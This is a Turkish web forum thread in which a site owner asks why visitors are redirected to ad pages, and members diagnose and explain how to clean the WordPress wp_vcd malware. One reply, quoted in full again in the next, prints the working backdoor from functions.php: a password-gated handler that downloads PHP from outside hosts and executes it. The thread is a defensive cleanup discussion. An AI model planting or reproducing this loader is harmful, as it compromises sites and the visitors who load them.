• 05-02-2018, 16:28:55
    #1
    arkadaşlar aşağıdaki sitemde benim tarayıcı ve mobilimde bir sıkıntı yokken bazı arkadaşlar farklı sayfaya reklam yönlendiriyor diyorlar, sadece adsense reklamları var bir kontrol eder misiniz?

    site linki

    eğer öyle bir durum var ise ne yapmam gerekiyor? yada sadece içerikleri yedekleme gibi bir imklanım var mı yani resimler makaleler vs diğer şekilde komple silerek içerikleri geri aktarabilir miyim?
  • 05-02-2018, 16:33:34
    #2
    Mobilden girdiğimde evet reklam sitesine yönlendiriyor. Çözüm hakkında bilgim yok. Cihaz lenovo P2. Wifi değil mobil denedim
  • 05-02-2018, 16:34:47
    #3
    Muun adlı üyeden alıntı: mesajı görüntüle
    Mobilden girdiğimde evet reklam sitesine yönlendiriyor. Çözüm hakkında bilgim yok. Cihaz lenovo P2. Wifi değil mobil denedim
    bende sorun yok görünüyor anlamadım gitti.. değerli arkadaşlarımızdan çözüm için yönlendirme bekliyorum..
  • 05-02-2018, 16:41:51
    #4
    aofkampus adlı üyeden alıntı: mesajı görüntüle
    arkadaşlar aşağıdaki sitemde benim tarayıcı ve mobilimde bir sıkıntı yokken bazı arkadaşlar farklı sayfaya reklam yönlendiriyor diyorlar, sadece adsense reklamları var bir kontrol eder misiniz?

    site linki

    eğer öyle bir durum var ise ne yapmam gerekiyor? yada sadece içerikleri yedekleme gibi bir imklanım var mı yani resimler makaleler vs diğer şekilde komple silerek içerikleri geri aktarabilir miyim?
    Merhaba, siteni şu https://sitecheck.sucuri.net adresten kontrol ettiğimde virüslü olduğunu gördüm. Malvare virüsü aynı ip üzerinden 1 kere reklam yönlendrimesi açar ve genellikle google aramalarından girildiğinde reklamı gösterir. Bu virüsten kurtulmak için wordpress kullanıyorsanız anti-malware eklentisi ile sitenizi taramanız ve çıkan zaralı kodları ve dosyları silmeniz gerekmektedir. Wordpress kullanmıyorsanız tek tek dosyalara bakacaksınız.
  • 05-02-2018, 16:42:18
    #5
    aofkampus adlı üyeden alıntı: mesajı görüntüle
    bende sorun yok görünüyor anlamadım gitti.. değerli arkadaşlarımızdan çözüm için yönlendirme bekliyorum..
    Mobilde olduğum için inceleme yapamıyorum. Siteniz wordpress sanırım. Büyük ihtimalle hacklink eklemişler. Çok zor olacağını zannetmiyorum kodları incelerseniz bulunur.
    http://www.webilgi.net/forum/wordpre...-webilgi-özel
    Bu eklenti ile taratıp direk bulabilirsiniz.
  • 05-02-2018, 16:42:31
    #6
    aofkampus adlı üyeden alıntı: mesajı görüntüle
    bende sorun yok görünüyor anlamadım gitti.. değerli arkadaşlarımızdan çözüm için yönlendirme bekliyorum..
    Wp-admin'den girdiğiniz ip'yi logladığı için bu malware kendiniz goremiyorsunuz. Bu loglar da wp-includes'ta wp-feed in içinde. IP'niz statik değilse, modemi resetleyin, çerezleri silin, google arama sonuclarından girin, goreceksiniz. Referral olarak sadece arama motorunun üzerinden çalışması için kodlanmış bu. Direk girenler de göremeyebilir.

    Hocam yolunu soyledrim ama anlamayan adam saatlerce uğraştırıyor. O yüzden daha bulaşmıyorum bu konulara. Bana kalırsa bir arkadaşla anlaşın ve temizletin.
  • 05-02-2018, 16:49:26
    #7
    Muun adlı üyeden alıntı: mesajı görüntüle
    Mobilde olduğum için inceleme yapamıyorum. Siteniz wordpress sanırım. Büyük ihtimalle hacklink eklemişler. Çok zor olacağını zannetmiyorum kodları incelerseniz bulunur.
    http://www.webilgi.net/forum/wordpre...-webilgi-özel
    Bu eklenti ile taratıp direk bulabilirsiniz.
    eklentiyi indirdim nasıl kullanacağım sadece bir php dosyası mevcut.



    SnmzAjans adlı üyeden alıntı: mesajı görüntüle
    Wp-admin'den girdiğiniz ip'yi logladığı için bu malware kendiniz goremiyorsunuz. Bu loglar da wp-includes'ta wp-feed in içinde. IP'niz statik değilse, modemi resetleyin, çerezleri silin, google arama sonuclarından girin, goreceksiniz. Referral olarak sadece arama motorunun üzerinden çalışması için kodlanmış bu. Direk girenler de göremeyebilir.

    Hocam yolunu soyledrim ama anlamayan adam saatlerce uğraştırıyor. O yüzden daha bulaşmıyorum bu konulara. Bana kalırsa bir arkadaşla anlaşın ve temizletin.
    aslında bir ipucu verseniz sonuçta sıkıntılı bir durum
  • 05-02-2018, 16:58:09
    #8
    aofkampus adlı üyeden alıntı: mesajı görüntüle
    eklentiyi indirdim nasıl kullanacağım sadece bir php dosyası mevcut.





    aslında bir ipucu verseniz sonuçta sıkıntılı bir durum
    functions.php'den tüm aşağıdaki kodları silin

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '475b713dbdf25d7dd4c8d5921ded83bc'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {
                    
     
                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {
                                
                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = <span class="userTag">@file_get_contents\("</span>http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           <span class="userTag">@file_put_contents(__FILE__, $file);</span>
                                                                   print "true";
                                                                                                                 }
     
                                                                                }
                                    }
                            }
                    break;
                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {
                                
                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           <span class="userTag">@file_put_contents(__FILE__, $file);</span>
                                                                   print "true";
                                                                                                                 }
     
                                                                                }
                                    }
                            }
                    break;
                    
                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }
                
            die("");
        }
     
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
            if (($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag">@file_get_contents_tcurl("</span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    <span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        <span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            <span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    <span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        <span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            <span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
                        }
                    }
                    
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            }
            
            
            
            
            
        }
    }
    //$start_wp_theme_tmp
    //wp_tmp
     
    //$end_wp_theme_tmp
    ?>
    Sonra:

    Wp-includes'un içinden wp-tmp, wp-vcd ve wp-feed i tamamen silin.

    Sonra:

    wp-includes'un içindeki wp-post'un içine girip en ustte çıkan wp-tmp ya da wp-vcd ile alakalı php kodu silin. en ustte hemen goreceksiniz...

    404 js malware hatası gibi bir şey kalacak sucuride. sucuri hata veriyor ama bir sorun yok, tehlikeli değil yani. Google hata vermiyor bu konuda... ama eğer bunu da temizlemek istiyorsanız, wordpress ve tema dosyalarını silip (silmeniz gerekiyor, uzerine yedek atmayın. sildikten sonra isterseniz yedek atabilirsiniz. config dosyasını ve uploads'ı silmeyin) tekrar yuklemeniz gerekecek.
  • 05-02-2018, 17:14:56
    #9
    SnmzAjans adlı üyeden alıntı: mesajı görüntüle
    functions.php'den tüm aşağıdaki kodları silin

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '475b713dbdf25d7dd4c8d5921ded83bc'))
        {
    $div_code_name="wp_vcd";
            switch ($_REQUEST['action'])
                {
                    
     
                    case 'change_domain';
                        if (isset($_REQUEST['newdomain']))
                            {
                                
                                if (!empty($_REQUEST['newdomain']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\$tmpcontent = <span class="userTag">@file_get_contents\("</span>http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
                                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                           <span class="userTag">@file_put_contents(__FILE__, $file);</span>
                                                                   print "true";
                                                                                                                 }
     
                                                                                }
                                    }
                            }
                    break;
                                    case 'change_code';
                        if (isset($_REQUEST['newcode']))
                            {
                                
                                if (!empty($_REQUEST['newcode']))
                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {
                                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                           <span class="userTag">@file_put_contents(__FILE__, $file);</span>
                                                                   print "true";
                                                                                                                 }
     
                                                                                }
                                    }
                            }
                    break;
                    
                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                }
                
            die("");
        }
     
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
               {
               }
                else
                {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                }
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
    $wp_auth_key='08b370e35d008b6591dd40b0eec23025';
            if (($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.com/code.php") OR $tmpcontent = <span class="userTag">@file_get_contents_tcurl("</span>http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    <span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        <span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            <span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
                        }
                    }
                    
                }
            }
            
            
            elseif ($tmpcontent = <span class="userTag">@file_get_contents("</span>http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    <span class="userTag">@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);</span>
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        <span class="userTag">@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);</span>
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            <span class="userTag">@file_put_contents('wp-tmp.php', $tmpcontent);</span>
                        }
                    }
                    
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            }
            
            
            
            
            
        }
    }
    //$start_wp_theme_tmp
    //wp_tmp
     
    //$end_wp_theme_tmp
    ?>
    Sonra:

    Wp-includes'un içinden wp-tmp, wp-vcd ve wp-feed i tamamen silin.

    Sonra:

    wp-includes'un içindeki wp-post'un içine girip en ustte çıkan wp-tmp ya da wp-vcd ile alakalı php kodu silin. en ustte hemen goreceksiniz...

    404 js malware hatası gibi bir şey kalacak sucuride. sucuri hata veriyor ama bir sorun yok, tehlikeli değil yani. Google hata vermiyor bu konuda... ama eğer bunu da temizlemek istiyorsanız, wordpress ve tema dosyalarını silip (silmeniz gerekiyor, uzerine yedek atmayın. sildikten sonra isterseniz yedek atabilirsiniz. config dosyasını ve uploads'ı silmeyin) tekrar yuklemeniz gerekecek.
    öncelikle çok teşekküre derim,

    adımlardan wp-includes'un içindeki wp-post'un içine girip en ustte çıkan wp-tmp ya da wp-vcd ile alakalı php kodu silin yaptığımda site komple çöküyor, kod aşağıda acaba belli bir kısmını mı silmem gerekiyor?

    <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?><?php